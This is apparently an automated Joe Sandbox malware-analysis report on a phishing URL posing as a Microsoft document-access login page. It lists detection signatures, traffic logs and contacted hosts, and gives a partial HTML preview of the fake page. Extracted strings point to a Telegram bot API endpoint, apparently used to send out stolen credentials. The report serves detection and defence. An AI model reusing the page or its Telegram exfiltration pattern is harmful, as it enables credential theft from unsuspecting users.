Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://cvn7.sa.com/invoice.html?app=

Overview

General Information

Sample URL:	https://cvn7.sa.com/invoice.html?app=
Analysis ID:	1428483
Infos:

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish10

Phishing site detected (based on image similarity)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Classification

×

Process Tree

System is w10x64

chrome.exe (PID: 5844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2208,i,10511966105780374271,9107718305647574607,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cvn7.sa.com/invoice.html?app=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_45	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://cvn7.sa.com/invoice.html?app=

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_45, type: DROPPED

Phishing site detected (based on image similarity)

Source: https://cvn7.sa.com/invoice.html?app=

Matcher: Found strong image similarity, brand: MICROSOFT

Source: https://cvn7.sa.com/invoice.html?app=

HTTP Parser: Number of links: 0

Source: https://cvn7.sa.com/invoice.html?app=

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://cvn7.sa.com/invoice.html?app=

HTTP Parser: Title: Document Access - Microsoft does not match URL

Source: https://cvn7.sa.com/invoice.html?app=

HTTP Parser: <input type="password" .../> found

Source: https://cvn7.sa.com/invoice.html?app=	HTTP Parser: No favicon
Source: https://cvn7.sa.com/invoice.html?app=	HTTP Parser: No favicon

Source: https://cvn7.sa.com/invoice.html?app=	HTTP Parser: No <meta name="author".. found
Source: https://cvn7.sa.com/invoice.html?app=	HTTP Parser: No <meta name="author".. found

Source: https://cvn7.sa.com/invoice.html?app=	HTTP Parser: No <meta name="copyright".. found
Source: https://cvn7.sa.com/invoice.html?app=	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.4:49748 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /invoice.html?app= HTTP/1.1Host: cvn7.sa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cvn7.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /OttF6D2.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cvn7.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cvn7.sa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cvn7.sa.com/invoice.html?app=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://cvn7.sa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://cvn7.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /OttF6D2.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: cvn7.sa.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 23:52:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: chromecache_45.2.dr	String found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b
Source: chromecache_45.2.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
Source: chromecache_45.2.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: chromecache_45.2.dr	String found in binary or memory: https://api.telegram.org/bot$
Source: chromecache_45.2.dr	String found in binary or memory: https://i.imgur.com/OttF6D2.png
Source: chromecache_45.2.dr	String found in binary or memory: https://manuchehr.me
Source: chromecache_45.2.dr	String found in binary or memory: https://outlook.office.com/mail/deeplink/attachment/AAMkAGIyNzRiOWZlLTc1NjQtNGI4YS1hNzMxLTJiYjM2MTc3
Source: chromecache_45.2.dr	String found in binary or memory: https://t-bot-r.netlify.app
Source: chromecache_45.2.dr	String found in binary or memory: https://youtube.com/manuchehr_programming

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.4:49748 version: TLS 1.2

Source: classification engine

Classification label: mal60.phis.win@16/17@16/8

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2208,i,10511966105780374271,9107718305647574607,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cvn7.sa.com/invoice.html?app="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2208,i,10511966105780374271,9107718305647574607,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://cvn7.sa.com/invoice.html?app=	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	0%	URL Reputation	safe
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cs1100.wpc.omegacdn.net	152.199.4.44	true	false		unknown
www.google.com	74.125.138.105	true	false		high
api.ipify.org	172.67.74.152	true	false		high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false		unknown
cvn7.sa.com	91.185.215.3	true	false		unknown
ipv4.imgur.map.fastly.net	151.101.12.193	true	false		unknown
windowsupdatebg.s.llnwi.net	69.164.42.0	true	false		unknown
aadcdn.msftauth.net	unknown	unknown	false		unknown
i.imgur.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://i.imgur.com/OttF6D2.png	false		high
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	false	URL Reputation: safe	unknown
https://cvn7.sa.com/favicon.ico	false		unknown
https://cvn7.sa.com/invoice.html?app=	true		unknown
https://api.ipify.org/?format=json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://manuchehr.me	chromecache_45.2.dr	false		unknown
https://api.telegram.org/bot$	chromecache_45.2.dr	false		high
https://t-bot-r.netlify.app	chromecache_45.2.dr	false		unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b	chromecache_45.2.dr	false	URL Reputation: safe	unknown
https://youtube.com/manuchehr_programming	chromecache_45.2.dr	false		high
https://outlook.office.com/mail/deeplink/attachment/AAMkAGIyNzRiOWZlLTc1NjQtNGI4YS1hNzMxLTJiYjM2MTc3	chromecache_45.2.dr	false		high
https://api.ipify.org?format=json	chromecache_45.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
74.125.138.105	www.google.com	United States		15169	GOOGLEUS	false
91.185.215.3	cvn7.sa.com	Slovenia		41828	TELEMACH-HOSTINGSI	false
151.101.12.193	ipv4.imgur.map.fastly.net	United States		54113	FASTLYUS	false
152.199.4.44	cs1100.wpc.omegacdn.net	United States		15133	EDGECASTUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
151.101.52.193	unknown	United States		54113	FASTLYUS	false
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428483
Start date and time:	2024-04-19 01:51:44 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://cvn7.sa.com/invoice.html?app=
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.win@16/17@16/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.253.124.94, 142.250.9.84, 64.233.176.138, 64.233.176.113, 64.233.176.102, 64.233.176.100, 64.233.176.101, 64.233.176.139, 34.104.35.123, 142.251.15.95, 108.177.122.95, 64.233.185.95, 64.233.177.95, 142.250.9.95, 74.125.138.95, 173.194.219.95, 172.253.124.95, 142.250.105.95, 172.217.215.95, 64.233.176.95, 74.125.136.95, 40.68.123.157, 69.164.42.0, 192.229.211.108, 13.95.31.18, 20.242.39.171
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: https://cvn7.sa.com/invoice.html?app=

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 45

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (949), with CRLF line terminators
Category:	downloaded
Size (bytes):	9701
Entropy (8bit):	5.540245211183691
Encrypted:	false
SSDEEP:	192:01ghYeLwqFDjgsJTUTun9FSun3pn15eLwfZpQFVca26CSfLqk:WsdwqRFT4unnSunZn1GwfYkdSWk
MD5:	514019C3784C82FE36CEAF828F54B2FB
SHA1:	072A513E2A647CAA59B8C97AB904CCA65D06EC47
SHA-256:	D8E9300E66909A788F6CD68FE7BA7F31F19B2BEBDD2DBEB0FF06C8690EECA871
SHA-512:	E7B59A97BF815E9814E9F0F63E8560C815F4684EEA4DD6A0AF3D847A053815DB5CD2B140837A488D3D96355C490C0F074DBBE0B1FA9916CC36698C54E37AA87E
Malicious:	false
Reputation:	low
URL:	https://cvn7.sa.com/invoice.html?app=
Preview:	..</head>....<head>..<meta name="description" content="LOGIN THIS PAGE IS RESTRICTED">..<title>Document Access - Microsoft</title>..</head>....<body background="https://i.imgur.com/OttF6D2.png">..<p align="center">..<img src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft"/></p>..<div class="logincontainer" style="box-sizing: border-box; margin: 40px auto 100px; padding: 0px 10px; max-width: 500px; color: rgb(51, 51, 51); font-family: "Open Sans", Verdana, Tahoma, serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">...<div

Chrome Cache Entry: 46

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	low
URL:	https://cvn7.sa.com/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 47

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32058)
Category:	downloaded
Size (bytes):	86659
Entropy (8bit):	5.36781915816204
Encrypted:	false
SSDEEP:	1536:YNhEyjjTikEJO4edXXe9J578go6MWX2xkj8e4c4j2ll2AckaXEP6n15HZ+FhFcQ7:uxc2yjx4j2uX/kcQDU8Cu9
MD5:	C9F5AEECA3AD37BF2AA006139B935F0A
SHA1:	1055018C28AB41087EF9CCEFE411606893DABEA2
SHA-256:	87083882CC6015984EB0411A99D3981817F5DC5C90BA24F0940420C5548D82DE
SHA-512:	DCFF2B5C2B8625D3593A7531FF4DDCD633939CC9F7ACFEB79C18A9E6038FDAA99487960075502F159D44F902D965B0B5AED32B41BFA66A1DC07D85B5D5152B58
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
Preview:	/! jQuery v3.2.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var

Chrome Cache Entry: 48

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.378783493486176
Encrypted:	false
SSDEEP:	3:J1z4uQjR:Hz+jR
